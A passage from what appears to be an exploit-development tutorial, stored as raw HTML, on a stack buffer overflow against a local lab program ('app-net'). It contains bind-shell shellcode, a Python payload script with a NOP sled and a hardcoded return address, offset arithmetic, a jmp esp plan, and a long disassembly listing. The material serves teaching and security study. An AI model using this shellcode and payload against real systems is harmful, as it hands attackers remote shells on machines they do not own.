quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"/span span class="code-line"span class="go"payload = quot;\x90quot; * 406 # (532 - 119) - 7 = 406/span/span span class="code-line"/span span class="code-line"span class="go"payload += shellcode # append our shellcode/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x90quot; * 7 # another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x94\xb6\xae\xbfquot; # the address of our shellcode/span/span span class="code-line"span class="gp" # /spanspan class="k"in/span reverse span class="o"(/spanlittle endianspan class="o")/span/span span class="code-line"/span span class="code-line"span class="gp"# /spancreate the tcp socket/span span class="code-line"span class="go"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanconnect to span class="m"127/span.0.0.1 port span class="m"9999/span/span span class="code-line"span class="go"s.connect((quot;127.0.0.1quot;, 9999))/span/span span class="code-line"/span span class="code-line"span class="gp"# /spansend our payload/span span class="code-line"span class="go"s.send(payload)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanclose the socket/span span class="code-line"span class="go"s.close()/span/span span class="code-line"span class="gp"[email protected]:~$ /spanpython app-net-exploit.py /span span class="code-line"span class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"nc: unable to connect to address 127.0.0.1, service 9998/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the exploit that we used last time didn't work. The reason for this is because the position of the stack has moved, so the shellcode isn't at the same address everytime the application is launched./p pThe offset here before we start overwriting EIP is 532. I want to explain quickly why this is./p pWe have 3 local variables, codechar p[512];/code (on line 100 of the source) and codeint r, i;/code (on line 101)./p pThese variables go on to the stack in reverse order, so first (closest to the beginning of the a href="https://en.wikipedia.org/wiki/Call_stack#Structure" target="_blank"stack frame/a) codei/code, then coder/code and lastly codep/code./p pWhen writes happen here they happen in the opposite direction, so a write at codep/code will eventually overwrite coder/code (after filling up the reserved space for codep/code) and then codei/code./p pWe are reserving 512 bytes for codep/code, each int is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes./p pLastly right under the local variables we have the saved EBP from the calling function, this is another 4 bytes. The return address is stored right after the saved EBP so that takes us to 532 bytes./p h2Returning From A Function/h2 pI explained this in much more detail in part a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a but just before a function returns, the stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe strongRET ADDR/strong is what we are overwriting to take control of EIP. What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/span span class="code-line"span class="normal"290/span/span span class="code-line"span class="normal"291/span/span span class="code-line"span class="normal"292/span/span span class="code-line"span class="normal"293/span/span span class="code-line"span class="normal"294/span/span span class="code-line"span class="normal"295/span/span span class="code-line"span class="normal"296/span/span span class="code-line"span class="normal"297/span/span span class="code-line"span class="normal"298/span/span span class="code-line"span class="normal"299/span/span span class="code-line"span class="normal"300/span/span span class="code-line"span class="normal"301/span/span span class="code-line"span class="normal"302/span/span span class="code-line"span class="normal"303/span/span span class="code-line"span class="normal"304/span/span span class="code-line"span class="normal"305/span/span span class="code-line"span class="normal"306/span/span span class="code-line"span class="normal"307/span/span span class="code-line"span class="normal"308/span/span span class="code-line"span class="normal"309/span/span span class="code-line"span class="normal"310/span/span span class="code-line"span class="normal"311/span/span span class="code-line"span class="normal"312/span/span span class="code-line"span class="normal"313/span/span span class="code-line"span class="normal"314/span/span span class="code-line"span class="normal"315/span/span span class="code-line"span class="normal"316/span/span span class="code-line"span class="normal"317/span/span span class="code-line"span class="normal"318/span/span span class="code-line"span class="normal"319/span/span span class="code-line"span class="normal"320/span/span span class="code-line"span class="normal"321/span/span span class="code-line"span class="normal"322/span/span span class="code-line"span class="normal"323/span/span span class="code-line"span class="normal"324/span/span span class="code-line"span class="normal"325/span/span span class="code-line"span class="normal"326/span/span span class="code-line"span class="normal"327/span/span span class="code-line"span class="normal"328/span/span span class="code-line"span class="normal"329/span/span span class="code-line"span class="normal"330/span/span span class="code-line"span class="normal"331/span/span span class="code-line"span class="normal"332/span/span span class="code-line"span class="normal"333/span/span span class="code-line"span class="normal"334/span/span span class="code-line"span class="normal"335/span/span span class="code-line"span class="normal"336/span/span span class="code-line"span class="normal"337/span/span span class="code-line"span class="normal"338/span/span span class="code-line"span class="normal"339/span/span span class="code-line"span class="normal"340/span/span span class="code-line"span class="normal"341/span/span span class="code-line"span class="normal"342/span/span span class="code-line"span class="normal"343/span/span span class="code-line"span class="normal"344/span/span span class="code-line"span class="normal"345/span/span span class="code-line"span class="normal"346/span/span span class="code-line"span class="normal"347/span/span span class="code-line"span class="normal"348/span/span span class="code-line"span class="normal"349/span/span span class="code-line"span class="normal"350/span/span span class="code-line"span class="normal"351/span/span span class="code-line"span class="normal"352/span/span span class="code-line"span class="normal"353/span/span span class="code-line"span class="normal"354/span/span span class="code-line"span class="normal"355/span/span span class="code-line"span class="normal"356/span/span span class="code-line"span class="normal"357/span/span span class="code-line"span class="normal"358/span/span span class="code-line"span class="normal"359/span/span span class="code-line"span class="normal"360/span/span span class="code-line"span class="normal"361/span/span span class="code-line"span class="normal"362/span/span span class="code-line"span class="normal"363/span/span span class="code-line"span class="normal"364/span/span span class="code-line"span class="normal"365/span/span span class="code-line"span class="normal"366/span/span span class="code-line"span class="normal"367/span/span span class="code-line"span class="normal"368/span/span span class="code-line"span class="normal"369/span/span span class="code-line"span class="normal"370/span/span span class="code-line"span class="normal"371/span/span span class="code-line"span class="normal"372/span/span span class="code-line"span class="normal"373/span/span span class="code-line"span class="normal"374/span/span span class="code-line"span class="normal"375/span/span span class="code-line"span class="normal"376/span/span span class="code-line"span class="normal"377/span/span span class="code-line"span class="normal"378/span/span span class="code-line"span class="normal"379/span/span span class="code-line"span class="normal"380/span/span span class="code-line"span class="normal"381/span/span span class="code-line"span class="normal"382/span/span span class="code-line"span class="normal"383/span/span span class="code-line"span class="normal"384/span/span span class="code-line"span class="normal"385/span/span span class="code-line"span class="normal"386/span/span span class="code-line"span class="normal"387/span/span span class="code-line"span class="normal"388/span/span span class="code-line"span class="normal"389/span/span span class="code-line"span class="normal"390/span/span span class="code-line"span class="normal"391/span/span span class="code-line"span class="normal"392/span/span span class="code-line"span class="normal"393/span/span span class="code-line"span class="normal"394/span/span span class="code-line"span class="normal"395/span/span span class="code-line"span class="normal"396/span/span span class="code-line"span class="normal"397/span/span span class="code-line"span class="normal"398/span/span span class="code-line"span class="normal"399/span/span span class="code-line"span class="normal"400/span/span span class="code-line"span class="normal"401/span/span span class="code-line"span class="normal"402/span/span span class="code-line"span class="normal"403/span/span span class="code-line"span class="normal"404/span/span span class="code-line"span class="normal"405/span/span span class="code-line"span class="normal"406/span/span span class="code-line"span class="normal"407/span/span span class="code-line"span class="normal"408/span/span span class="code-line"span class="normal"409/span/span span class="code-line"span class="normal"410/span/span span class="code-line"span class="normal"411/span/span span class="code-line"span class="normal"412/span/span span class="code-line"span class="normal"413/span/span span class="code-line"span class="normal"414/span/span span class="code-line"span class="normal"415/span/span span class="code-line"span class="normal"416/span/span span class="code-line"span class="normal"417/span/span span class="code-line"span class="normal"418/span/span span class="code-line"span class="normal"419/span/span span class="code-line"span class="normal"420/span/span span class="code-line"span class="normal"421/span/span span class="code-line"span class="normal"422/span/span span class="code-line"span class="normal"423/span/span span class="code-line"span class="normal"424/span/span span class="code-line"span class="normal"425/span/span span class="code-line"span class="normal"426/span/span span class="code-line"span class="normal"427/span/span span class="code-line"span class="normal"428/span/span span class="code-line"span class="normal"429/span/span span class="code-line"span class="normal"430/span/span span class="code-line"span class="normal"431/span/span span class="code-line"span class="normal"432/span/span span class="code-line"span class="normal"433/span/span span class="code-line"span class="normal"434/span/span span class="code-line"span class="normal"435/span/span span class="code-line"span class="normal"436/span/span span class="code-line"span class="normal"437/span/span span class="code-line"span class="normal"438/span/span span class="code-line"span class="normal"439/span/span span class="code-line"span class="normal"440/span/span span class="code-line"span class="normal"441/span/span span class="code-line"span class="normal"442/span/span span class="code-line"span class="normal"443/span/span span class="code-line"span class="normal"444/span/span span class="code-line"span class="normal"445/span/span span class="code-line"span class="normal"446/span/span span class="code-line"span class="normal"447/span/span span class="code-line"span class="normal"448/span/span span class="code-line"span class="normal"449/span/span span class="code-line"span class="normal"450/span/span span class="code-line"span class="normal"451/span/span span class="code-line"span class="normal"452/span/span span class="code-line"span class="normal"453/span/span span class="code-line"span class="normal"454/span/span span class="code-line"span class="normal"455/span/span span class="code-line"span class="normal"456/span/span span class="code-line"span class="normal"457/span/span span class="code-line"span class="normal"458/span/span span class="code-line"span class="normal"459/span/span span class="code-line"span class="normal"460/span/span span class="code-line"span class="normal"461/span/span span class="code-line"span class="normal"462/span/span span class="code-line"span class="normal"463/span/span span class="code-line"span class="normal"464/span/span span class="code-line"span class="normal"465/span/span span class="code-line"span class="normal"466/span/span span class="code-line"span class="normal"467/span/span span class="code-line"span class="normal"468/span/span span class="code-line"span class="normal"469/span/span span class="code-line"span class="normal"470/span/span span class="code-line"span class="normal"471/span/span span class="code-line"span class="normal"472/span/span span class="code-line"span class="normal"473/span/span span class="code-line"span class="normal"474/span/span span class="code-line"span class="normal"475/span/span span class="code-line"span class="normal"476/span/span span class="code-line"span class="normal"477/span/span span class="code-line"span class="normal"478/span/span span class="code-line"span class="normal"479/span/span span class="code-line"span class="normal"480/span/span span class="code-line"span class="normal"481/span/span span class="code-line"span class="normal"482/span/span span class="code-line"span class="normal"483/span/span span class="code-line"span class="normal"484/span/span span class="code-line"span class="normal"485/span/span span class="code-line"span class="normal"486/span/span span class="code-line"span class="normal"487/span/span span class="code-line"span class="normal"488/span/span span class="code-line"span class="normal"489/span/span span class="code-line"span class="normal"490/span/span span class="code-line"span class="normal"491/span/span span class="code-line"span class="normal"492/span/span span class="code-line"span class="normal"493/span/span span class="code-line"span class="normal"494/span/span span class="code-line"span class="normal"495/span/span span class="code-line"span class="normal"496/span/span span class="code-line"span class="normal"497/span/span span class="code-line"span class="normal"498/span/span span class="code-line"span class="normal"499/span/span span class="code-line"span class="normal"500/span/span span class="code-line"span class="normal"501/span/span span class="code-line"span class="normal"502/span/span span class="code-line"span class="normal"503/span/span span class="code-line"span class="normal"504/span/span span class="code-line"span class="normal"505/span/span span class="code-line"span class="normal"506/span/span span class="code-line"span class="normal"507/span/span span class="code-line"span class="normal"508/span/span span class="code-line"span class="normal"509/span/span span class="code-line"span class="normal"510/span/span span class="code-line"span class="normal"511/span/span span class="code-line"span class="normal"512/span/span span class="code-line"span class="normal"513/span/span span class="code-line"span class="normal"514/span/span span class="code-line"span class="normal"515/span/span span class="code-line"span class="normal"516/span/span span class="code-line"span class="normal"517/span/span span class="code-line"span class="normal"518/span/span span class="code-line"span class="normal"519/span/span span class="code-line"span class="normal"520/span/span span class="code-line"span class="normal"521/span/span span class="code-line"span class="normal"522/span/span span class="code-line"span class="normal"523/span/span span class="code-line"span class="normal"524/span/span span class="code-line"span class="normal"525/span/span span class="code-line"span class="normal"526/span/span span class="code-line"span class="normal"527/span/span span class="code-line"span class="normal"528/span/span span class="code-line"span class="normal"529/span/span span class="code-line"span class="normal"530/span/span span class="code-line"span class="normal"531/span/span span class="code-line"span class="normal"532/span/span span class="code-line"span class="normal"533/span/span span class="code-line"span class="normal"534/span/span span class="code-line"span class="normal"535/span/span span class="code-line"span class="normal"536/span/span span class="code-line"span class="normal"537/span/span span class="code-line"span class="normal"538/span/span span class="code-line"span class="normal"539/span/span span class="code-line"span class="normal"540/span/span span class="code-line"span class="normal"541/span/span span class="code-line"span class="normal"542/span/span span class="code-line"span class="normal"543/span/span span class="code-line"span class="normal"544/span/span span class="code-line"span class="normal"545/span/span span class="code-line"span class="normal"546/span/span span class="code-line"span class="normal"547/span/span span class="code-line"span class="normal"548/span/span span class="code-line"span class="normal"549/span/span span class="code-line"span class="normal"550/span/span span class="code-line"span class="normal"551/span/span span class="code-line"span class="normal"552/span/span span class="code-line"span class="normal"553/span/span span class="code-line"span class="normal"554/span/span span class="code-line"span class="normal"555/span/span span class="code-line"span class="normal"556/span/span span class="code-line"span class="normal"557/span/span span class="code-line"span class="normal"558/span/span span class="code-line"span class="normal"559/span/span span class="code-line"span class="normal"560/span/span span class="code-line"span class="normal"561/span/span span class="code-line"span class="normal"562/span/span span class="code-line"span class="normal"563/span/span span class="code-line"span class="normal"564/span/span span class="code-line"span class="normal"565/span/span span class="code-line"span class="normal"566/span/span span class="code-line"span class="normal"567/span/span span class="code-line"span class="normal"568/span/span span class="code-line"span class="normal"569/span/span span class="code-line"span class="normal"570/span/span span class="code-line"span class="normal"571/span/span span class="code-line"span class="normal"572/span/span span class="code-line"span class="normal"573/span/span span class="code-line"span class="normal"574/span/span span class="code-line"span class="normal"575/span/span span class="code-line"span class="normal"576/span/span span class="code-line"span class="normal"577/span/span span class="code-line"span class="normal"578/span/span span class="code-line"span class="normal"579/span/span span class="code-line"span class="normal"580/span/span span class="code-line"span class="normal"581/span/span span class="code-line"span class="normal"582/span/span span class="code-line"span class="normal"583/span/span span class="code-line"span class="normal"584/span/span span class="code-line"span class="normal"585/span/span span class="code-line"span class="normal"586/span/span span class="code-line"span class="normal"587/span/span span class="code-line"span class="normal"588/span/span span class="code-line"span class="normal"589/span/span span class="code-line"span class="normal"590/span/span span class="code-line"span class="normal"591/span/span span class="code-line"span class="normal"592/span/span span class="code-line"span class="normal"593/span/span span class="code-line"span class="normal"594/span/span span class="code-line"span class="normal"595/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nl"./app-net/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485e0/span span class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485e0: 55 push ebp/span/span span class="code-line"span class="x" 80485e1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485e3: 53 push ebx/span/span span class="code-line"span class="x" 80485e4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485e7: e8 00 00 00 00 call 80485ec lt;_init+0xcgt;/span/span span class="code-line"span class="x" 80485ec: 5b pop ebx/span/span span class="code-line"span class="x" 80485ed: 81 c3 14 0b 00 00 add ebx,0xb14/span/span span class="code-line"span class="x" 80485f3: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 80485f9: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 80485fb: 74 05 je 8048602 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 80485fd: e8 ae 00 00 00 call 80486b0 lt;[email protected];/span/span span class="code-line"span class="x" 8048602: 58 pop eax/span/span span class="code-line"span class="x" 8048603: 5b pop ebx/span/span span class="code-line"span class="x" 8048604: c9 leave /span/span span class="code-line"span class="x" 8048605: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048610/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048610: ff 35 04 91 04 08 push DWORD PTR ds:0x8049104/span/span span class="code-line"span class="x" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="x" 804861c: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048620/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="x" 8048626: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048630/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="x" 8048636: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048640/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="x" 8048646: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048650/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="x" 8048656: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048660/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="x" 8048666: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span 